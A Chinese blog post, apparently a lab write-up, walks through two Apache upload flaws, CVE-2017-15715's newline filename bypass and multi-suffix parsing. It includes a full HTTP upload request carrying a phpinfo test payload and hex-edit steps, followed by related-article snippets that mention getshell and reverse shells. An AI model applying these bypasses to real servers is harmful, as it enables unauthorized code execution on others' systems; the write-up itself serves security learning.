Apache中间件漏洞

最新推荐文章于 2024-04-28 17:04:29 发布
最新推荐文章于 2024-04-28 17:04:29 发布
阅读量624 收藏 10
点赞数 4
分类专栏: 中间件安全 文章标签: apache 中间件 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_58849785/article/details/137691540
版权

目录

什么是Apache

Apache文件上传(CVE-2017-15715)

Apache后缀解析

什么是Apache

        Apache(音译为阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。

Apache文件上传(CVE-2017-15715)

        此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照 php 后缀进行解析,导致绕过一些服务器的安全策略

第一步:打开网站页面发现为空白,直接抓包看,发现Apache的版本存在漏洞

第二步:使用burp抓包,抓包后发送,发现响应包中显示apache版本(此版本存在漏洞)

第三步:构造文件上传post文件 (发现上传失败)

POST / HTTP/1.1

Host: 192.168.66.141:50532

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

Accept-Encoding: gzip, deflate

Content-Type: multipart/form-data; boundary=---------------------------9552222486401230933854482358

Content-Length: 358

Connection: close

Upgrade-Insecure-Requests: 1



-----------------------------9552222486401230933854482358

Content-Disposition: form-data; name="file"; filename="1.php"

Content-Type: application/octet-stream



<?php phpinfo();?>

-----------------------------9552222486401230933854482358

Content-Disposition: form-data; name="name"



1.php

-----------------------------9552222486401230933854482358--

第四步:将文件名修改为1.php.xxx再次上传发现文件上传成功,证明此处为黑名单验证

第五步:在1.php后添加a为标记,打开Hex将a处的61修改为0a,然后将数据包发送

第六步:访问1.php%0a,成功访问到phpinfo

Apache后缀解析

        Apache文件解析漏洞与用户的配置有密切的关系,严格来说属于用户配置问题。Apache文件解析漏洞涉及到一个解析文件的特性。Apache默认一个文件可以有多个以点.分割的后缀,当右边的后缀名无法识别,则继续向左识别;因此可以用于文件上传来绕过黑名单导致getshell。

第一步:上传php后缀文件,发现上传失败

第二步:抓取上传数据包将文件名修改为1.php.jpg,后进行上传

第三步:访问文件路径php成功解析

荔枝轩
关注
  • 4
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
中间件漏洞详解
06-11
本课程分别从iis5.x/6、iis7、apache三个中间件漏洞进行分析,首先从原理上介绍形成该漏洞的原因,而后通过实战的形式演示怎么利用这三种漏洞对服务器进行攻击。
Apache中间件漏洞复现
mingyqf的博客
02-13 1715
kali复现apache未知扩展名解析漏洞 2. 复现 我上传了一个名字叫shell.php.aaa 的文件,当此特性存在的时候,一看.aaa不认识, 继续解析,.php我认识,解析成php文件了。访问也是同理,比如访问phpinfo.php.qqq可成功显示phpinfo 那么哪些后缀Apache不认识? 不在mime.types当中的都不认识 (Multipurpose Internet Mail Extensions) sudo service apache2 restart cd /etc/apac
Apache 中间件漏洞(换行解析)详解
xinyue9966的博客
02-17 3604
介绍 Apache(音译为阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。它快速、可靠并且可通过简单的API扩充,将Perl/Python等解释器编译到服务器中。 简而言之,Apache服务器不仅简单好用,还能支持HTML、PHP、Perl、Python等基础语言。 目录介绍 bin-------存放常用的命令工具,例如httpd cgi-bin---存放Linux下常用的命令,例如xxx.sh co
Apache中间件漏洞学习
E1even的博客
10-19 3732
Apache HTTPD 换行解析漏洞(CVE-2017-15715) 原理: apache2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,1.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略 复现: 首先这里查看index.php <?php if(isset($_FILES['file'])) { $name = basename($_POST['name']); $ext = pathinfo($name,PATHINFO_EXTENSI
安全中级3:apache中间件漏洞
weixin_62870380的博客
06-06 1416
运维人员在配置http的默认配置文件的时候,开启了AddHandler application/x-httpd-php .php,虽然限制住了php文件,但是我们可以添加后缀.jpg,只要我们的后缀含有一个php文件就可以解析,没必要是最后一个后缀。我们上传php文件的时候,我们的服务器拒绝上传,但是 apache在配置文件的http.conf的时候开启了SSI(服务器端包含)服务,允许我们的html页面上传shtml文件,而我们的cgi是前端的一个脚本,我们利用他的语法执行任意的命令。
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本
12-09
Apache Airflow Celery 消息中间件命令执行漏洞CVE-2020-11981POC脚本 Airflow 是一个使用 python 语言编写的 data pipeline 调度和监控工作流的平台。Airflow 是通过 DAG(Directed acyclic graph 有向无环图)来...
Middleware-Vulnerability-detection:CVE、CMS、中间件漏洞检测利用合集 Since 2019-9-15
04-07
--2020.3 CVE-2019-17564 Apache Dubbo反序列化漏洞 --2020.7 CVE-2020-13925 Apache Kylin 远程命令执行漏洞 --2020.10 CVE-2020-13957 Apache Solr 未授权上传 --2020.11 CVE-2020-13942 Apache Unomi 远程代码...
vulnerability-list:在渗透测试中快速检测常见中间件,组件的高危漏洞
03-31
漏洞清单常见突破快速检测,目前包含以下突破的检测。测试环境为win10,python3。使用前需安装相关库:py -3 -m pip install -r requirements.txt有问题可提问题,最好附上报错截图。已发现的BUG:有些突破性的判断...
pikachu.zip
01-03
pikachu漏洞练习环境
Apache反向代理的功能和設置
ecommerce_Amazon的博客
04-25 606
Apache反向代理的功能用途和設置。
Java、Tomcat、Apache HTTP Server以及浏览器服务器的关系
lxl2092828212的博客
04-25 1039
Tomcat支持动态内容的处理,可以处理客户端发送的请求,并将逻辑处理后的结果返回给客户端。Tomcat是一个开源的Java Web服务器,用于运行Java Web应用程序。在简单的说,Java是一种编程语言,而Tomcat是一个Java Web服务器,用于运行Java Web应用程序。需要注意的是,Tomcat并不是一个专门用于web服务器的软件,它更多地用于运行Java应用程序。总结来说,Apache HTTP Server是一个通用的Web服务器,而Tomcat是一个Java Web容器。
Apache Doris 2.x 版本【保姆级】安装+使用教程
李指导的博客
04-25 1151
Apache Doris 是一个基于 MPP 架构的高性能、实时的分析型数据库,以极速易用的特点被人们所熟知,仅需亚秒级响应时间即可返回海量数据下的查询结果,不仅可以支持高并发的点查询场景,也能支持高吞吐的复杂分析场景。基于此,Apache Doris 能够较好的满足报表分析、即席查询、统一数仓构建、数据湖联邦查询加速等使用场景,用户可以在此之上构建用户行为分析、AB 实验平台、日志检索分析、用户画像分析、订单分析等应用。
Apache Log4j Server 反序列化命令执行漏洞(CVE-2017-5645)
san3144393495的博客
04-23 1036
ysoserial是在常见的java库中发现的一组实用程序和面向属性的编程“小工具链”,在适当的条件下,可以利用执行对象不安全反序列化的Java应用程序。当Log4j处理来自外部的序列化数据时,如果数据经过恶意修改,可能会触发不安全的反序列化操作,进而导致攻击者执行任意代码。如果数据是恶意pyload,就会触发不安全的反序列化操作,导致名命令执行漏洞,通过java的流泪有关。{bash,-i}:这个命令会执行解码后的 Bash 命令,即与指定的 IP 地址和端口建立一个交互式的 Shell 连接。
Apache和Nginx的区别以及如何选择
最新发布
ZhujiServer的博客
04-28 160
除了是因为竞争对手Nginx的崛起,也有一部分原因是其他一些新的Web服务器技术的涌现。目前市面上有许多Web服务器软件,常见的有Apache、Nginx、Microsoft Internet Information Services (IIS)、LiteSpeed Web Server、Tomcat、Node.js等等,其中Apache和Nginx是最常见的两款,算是占据了市场的主导地位,这两款Web服务器在不同的应用场景下都表现出色,并且拥有强大的社区支持和持续的开发更新。
Apache RocketMQ ACL 2.0 全新升级
阿里巴巴云原生的博客
04-26 1289
我们推出了 RocketMQ ACL 2.0 升级版,进一步提升 RocketMQ 数据的安全性。本文将介绍 RocketMQ ACL 2.0 的新特性、工作原理,以及相关的配置和实践。
绿色便携方式安装apache+mysql+tomcat+php集成环境并提供控制面板
晓夏IT笔记
04-24 1273
安装集成环境往往配置复杂,采用一个集成安装工具,可以方便地完成相关软件的一键安装!而能够采用portable方式实现完全绿色、便携方式的安装就更加方便!它只需要解压到你的电脑目录,即可运行,不需要install,也不会有任何注册表的改变!因此,你甚至可以把它放在一个外部存储,随带随用!——这就是XAMPP.
第六十五章 Apache 的替代选项 (Windows) - 替代选项 2:带有 NSD 的 Apache API 模块 (mod_csp24.dll)
yaoxin521123的博客
04-28 427
网关提供其他静态文件或需要通过此 Web 服务器访问管理门户,请添加文件类型。引擎处理的其他文件类型,请将新文件扩展名包含在要由。但是,如果需要使用 NSD,则可以使用它。以下指令可用于将对给定路径的所有文件的请求映射到。注意:此连接选项的使用频率不如选项。模块处理的常用文件扩展名(的网络服务守护程序 (,请将以下部分添加到。的启动顺序并不重要。
《HCIP-openEuler实验指导手册》1.7 Apache虚拟主机配置
xzzteach的博客
04-27 671
将上次实验/etc/httpd/conf.d/source.conf去除。
APACHE中间件基线规范
04-02
1. 安全性规范 1.1 禁用默认页面 1.2 禁止目录浏览 ...7.4 定期更新中间件版本 8. 安全加固规范 8.1 禁用不必要的模块 8.2 关闭不必要的端口 8.3 禁用不必要的服务 8.4 配置防火墙 8.5 定期进行安全扫描

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值